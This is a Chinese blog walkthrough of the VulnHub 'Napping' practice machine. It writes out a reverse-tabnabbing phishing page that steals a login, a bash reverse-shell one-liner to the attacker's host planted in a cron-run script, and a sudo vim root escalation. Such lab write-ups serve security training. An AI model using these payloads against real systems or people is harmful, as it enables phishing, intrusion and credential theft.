Napping靶机渗透测试记录

已于 2025-02-18 09:23:25 修改
阅读量353 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: VulnHub靶机 文章标签: napping靶机 vulhub vulhub靶机 反向标签钓鱼 Napping
于 2023-01-31 17:20:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44605964/article/details/128820572
本文介绍了一个名为Napping-101的靶机渗透测试过程,包括利用Reverse Tabnabbing钓鱼攻击获取初始权限,通过权限提升技巧最终获得root权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

靶机信息

下载地址:https://www.vulnhub.com/entry/napping-101,752/

网络连接:桥接

kali地址:192.168.1.100

ps:这个靶机最好装到virtualbox上,装在vmware可能会出现扫描不到的情况,靶机和kali都设置为桥接模式进行扫描

信息搜集

扫描网段存活主机信息
由于靶机安装在virtualbox上,扫描的时候也会有显示,靶机为192.168.1.104

nmap -sn 192.168.1.0/24

在这里插入图片描述

对目标做进一步的扫描

nmap -A 192.168.1.104

在这里插入图片描述

先查看80端口,发现是一个登录界面,可以去注册一个账号
在这里插入图片描述

注册完账号并登录后发现可以提交链接
在这里插入图片描述

漏洞利用

提交完链接后点击here即可跳转到链接界面
查了下发现使用a标签和target=_blank可以构成Reverse Tabnabbing钓鱼
在这里插入图片描述

在/var/www/html目录下放两个html文件,一个为站点首页(index.html),一个为钓鱼界面(test.html)

在kali上wget下载的网站首页文件为.php,需要重命名为.html

wget http://192.168.1.104/index.php
mv index.php index.html

vim test.html
<!DOCTYPE html>
<html>
<body>
    <script>
    	if(window.opener) window.opener.parent.location.replace('http://192.168.1.100:666/index.html');
    	if(window.opener  != window)  window.opener.parent.location.replace('http://192.168.1.100:666/index.html');
    </script>
</body>
</html>

在这里插入图片描述

访问kali下的网页,需要开启http服务
并在kali监听端口,监听的端口为钓鱼页面里链接的端口

python3 -m http.server 80
nc -lvp 666

在输入链接处,提交创建的钓鱼页面,过个两三分钟后,返回了数据包
在这里插入图片描述
在这里插入图片描述

权限提升

在返回的信息中发现了账号密码,密码这里需要url解码一下
daniel/C@ughtm3napping123,登录到daniel账号
在这里插入图片描述

查看daniel的id信息发现属于administrators组,查找属该组的文件
发现一个python脚本,这个脚本又打开了一个site_status.txt文件,每两分钟执行一次

find / -group administrators -type f 2>/dev/null

在这里插入图片描述

在tmp目录下写一个反向shell,在kali上监听端口
修改python脚本,加入shell脚本的路径,调用os执行

bash -c 'bash -i >& /dev/tcp/192.168.1.100/666 0>&1'

在这里插入图片描述

等脚本定时执行后,回连到adrian账户
sudo -l看一下,发现可以用root权限免密执行vim
直接vim提权

sudo vim -c ':!/bin/bash'
python3 -c 'import pty;pty.spawn("/bin/sh")'

获取到root权限,在root目录下获取到root.txt
在这里插入图片描述

Vulnhub napping-1.0.1靶机攻击实战(一)
初学者
02-08 923
到这里,就算获得了root的权限了,那么这里有人会问,为什么我们拿到了daniel用户的权限,不直接通过这个用户提权反而是要通过adrian用户建立反射shell进行提权呢?这个问题有兴趣的读者可以深入研究一下。
Vulnhub靶机网卡启动失败(Raise network interfaces)
qq_35664104的博客
02-26 742
使用一些Linux靶机进行搭建后可能会出现无法搜索到IP的情况,并且会在系统启动时报错,类似下图所示这个主要是因为vulnhub上的镜像由于搭建环境、版本等问题不适配,网卡没有正确识别导致的,我们进行如下修改。
vulnhub——napping-1.0.1靶机
Re1_zf的博客
11-01 1313
首先,创建一个反弹shell的sh文件,这里需要注意路径需要在当前用户目录下,否则没有权限创建文件。大概内容就是只要本地web服务可以正常访问,就每隔两分钟向日志文件中写入当前时间。修改一下py执行文件的内容,使其执行编辑好的反弹shell的脚本。这样的话,借助这个py文件,我们可以尝试向攻击机反弹shell。等待一会儿后会有一个shell反弹过来,同时查看一下权限。这里需要注意一下,返回的数据包需要进行一下URL解码。看一下这个目录下的执行日志,大概就是两分钟执行一次。查找一下这个组有权限运行的程序。
渗透测试学习之靶机napping-1.0.1
xdbzdgx的博客
04-30 1346
前期准备 1.下载靶机Napping-1.0.1WebGOAT: 1 ~ VulnHub 1.载入vmware,网络模式设置为NAT kali IP地址为192.168.88.128 靶机 IP地址为192.168.88.129 一 、信息收集 1.使用nnamp扫描器扫描开放的端口 nmap -T4 -sV -p- 192.168.88.129 发现开放了80端口和22远程控制端口 2.寻找web信息 访问后发现需要登录,随即注册账号并登录。 此处..
Vulnhub靶场:NAPPING: 1.0.1
weixin_69670995的博客
06-05 1526
发现a连接出现了刚刚输入的url,猜测这是一个社工,可以写一个钓鱼页面,新建一个b.html文件,将下面的代码写入。将靶机导入到Oracle VM VirtualBox中,网络设置仅主机模式,和kali使用相同的网卡。发现该py程序每两分钟执行一次,这里在用户的家目录下新建一个shell.sh文件。然后新建一个a.html文件,下面代码写入(写一个正常的页面就行)发现一个a连接,输入一个url再次查看网页源代码。发现22端口和80端口,使用浏览器访问80端口。发现是一个登陆页面,首先进行注册。
Vulnhub 靶机 Napping 1.0.1 write up Reverse Tabnabbing钓鱼 修改root权限的定时py文件 + vim 提权
YouthBelief的博客
01-12 1915
0x00 环境准备 下载地址 https://www.vulnhub.com/entry/napping-101,752/ 靶机介绍 Name: Napping: 1.0.1 Date release: 22 Oct 2021 Author: hadrian3689 Series: Napping Description Even Admins can fall asleep on the job 虚拟机 Virtualbox 仅主机 kali也用该网
【Vulnhub靶场】NAPPING: 1.0.1
DG_s1mple
04-01 6630
环境准备 下载靶机导入到vmware 攻击机IP地址为:192.168.2.18 靶机IP地址为:192.168.2.16 信息收集 我们使用nmap扫描一下靶机开放的端口信息 靶机开放了ssh跟http服务 我们首先访问一下他的http服务 是一个登录界面,并且可以注册账号,我们先注册一下 有一个文本框,我们测试一下功能 发现我们输入什么网站,他就跳转到什么网站,这么会存在Tabnabbing攻击 使用正常网站A的a标签设置为恶意网站B,恶意网站B中利用window.opener修改原先页面
NAPPING
10-24
标题"NAPPING"可能指的是一个与字体设计或者艺术相关的项目,因为"字体"是给定的标签之一。在IT行业中,字体通常涉及到用户界面(UI)设计、网页设计、图形设计等领域,是信息传达的重要组成部分。字体的选择和设计...
探索NAPPING字体设计的独特魅力
根据提供的文件信息,我们可以推断该文件可能涉及到“NAPPING”这一词汇或概念在“字体”这一特定领域中的应用或相关知识。由于文件标题和描述内容重复,且信息量较小,我们可以专注于围绕“NAPPING”这个词汇的含义...
如何删除导入napping
05-26
如果您想删除已导入的Python模块`napping`,可以使用以下命令: ``` pip uninstall napping ``` 这将从Python环境中删除`napping`模块及其依赖项。请注意,您需要在命令行中执行此命令,并确保您具有足够的权限来...
Vulnhub项目:NAPPING: 1.0.1
Ays.Ie的博客
05-07 889
Vulnhub项目:NAPPING: 1.0.1
靶机渗透练习17-Red
hirak0的博客
04-16 1938
靶机描述 靶机地址:https://www.vulnhub.com/entry/napping-101,752/ Description Even Admins can fall asleep on the job This works better with VirtualBox rather than VMware ## Changelog v1.0.1 - 2021-10-30 v1.0.0 - 2021-10-22 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机
4-vulnhub靶场,napping
qq_49078152的博客
08-21 487
vulnhub靶场,napping,vim提权,2>/dev/null过滤
渗透测试靶场容器vulhub
weixin_42489549的博客
06-09 478
Vulhub 是预先构建的易受攻击的 docker 环境的开源集合。不需要预先存在的 docker 知识,只需执行两个简单的命令,您就有一个易受攻击的环境。 安装 在 Ubuntu 20.04 上安装 docker/docker-compose: curl -s https://bootstrap.pypa.io/get-pip.py | python3 #安装最新版本 docker curl -s https://get.docker.com/ | sh #运行 docker service sys.
基于S7-200 PLC与组态王的六层电梯控制系统设计与实战经验
08-26
利用S7-200 PLC和组态王软件构建六层电梯控制系统的方法。首先阐述了PLC部分的设计思路,包括楼层信号采集、硬件滤波、寄存器分配以及方向判断逻辑等关键环节。接着探讨了组态王的人机交互设置,如动画展示、载重监测等功能的具体实现方式。文中还分享了一些常见的调试问题及其解决方案,例如信号传感器安装误差、通信延迟等问题,并提出了系统优化措施,如高峰期模式调整。最后强调了电梯安全回路设计的重要性。 适用人群:从事工业自动化领域的工程师和技术人员,特别是对PLC编程和HMI(人机界面)开发感兴趣的从业者。 使用场景及目标:适用于需要理解和掌握如何将PLC与HMI相结合进行复杂机电一体化项目开发的学习者;旨在帮助读者深入了解电梯控制系统的架构设计、编程技巧及故障排查方法。 其他说明:虽然文中提到的技术手段较为传统,但由于其稳定性高且易于维护,在某些特定应用场景下仍然具有较高的实用价值。
8+1绩效量化技术.doc
最新发布
08-26
8+1绩效量化技术.doc
高阶温度补偿带隙基准的Cadence电路设计文档(含超低温漂、带隙基准及高电源抑制比等特性) - 温度补偿
08-26
一种高精度带隙基准电路的设计方案,重点实现了超低温漂(1.9ppm)、高电源抑制比(-90dB)和低功耗(14.47μA)等关键性能指标。通过Cadence电路设计工具,在61OA工艺库支持下完成原理图设计、仿真验证与温度补偿优化,包含完整的推导过程、调试记录及电路截图,并提供37页详细设计文档与虚拟机环境支持。 适合人群:具备模拟集成电路基础,从事低功耗、高精度基准源设计的1-3年经验研发工程师或研究生。 使用场景及目标:①掌握高阶温度补偿在带隙基准中的实现方法;②学习如何在Cadence环境下优化PSRR与温漂性能;③应用于高精度ADC、电源管理芯片等对参考电压稳定性要求严苛的场景。 阅读建议:建议结合提供的设计文档、工艺库与仿真截图进行实操复现,重点关注温度补偿结构设计与低功耗优化策略,以深入理解带隙基准的核心设计逻辑。
基于三菱PLC的PID温度控制设计:精准调控加热炉与加热器温度系统 PID控制
08-26
使用三菱PLC进行温度PID控制的设计过程,旨在实现对加热炉和加热器温度的精确控制。文章首先解释了PID控制的基本概念及其在工业控制领域的应用价值,特别是针对加热炉这种需要高精度温度控制的场景。接着,文章逐步讲解了从硬件准备到软件编程的具体实施步骤,包括温度传感器数据采集、PID算法实现以及参数调整等方面的内容。通过合理的参数配置和不断的调试优化,最终实现了对加热炉温度的有效控制,提高了产品质量和生产效率。 适合人群:从事工业自动化控制的技术人员,尤其是那些希望深入了解并掌握PID控制原理及其在实际项目中应用的人群。 使用场景及目标:适用于需要对温度进行精密控制的各种工业场合,如冶金、化工等行业中的加热炉控制系统。主要目标是帮助技术人员理解和实现基于三菱PLC的PID温度控制,提升系统的响应速度和稳定性。 其他说明:文中提到的PID控制算法虽然复杂,但在三菱PLC的支持下变得相对容易实现。同时,为了获得最佳的控制效果,还需要结合具体的应用环境不断尝试和优化各个参数。
混凝土真空吸水泵安全操作规程技术交底.doc
08-26
混凝土真空吸水泵安全操作规程技术交底.doc
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值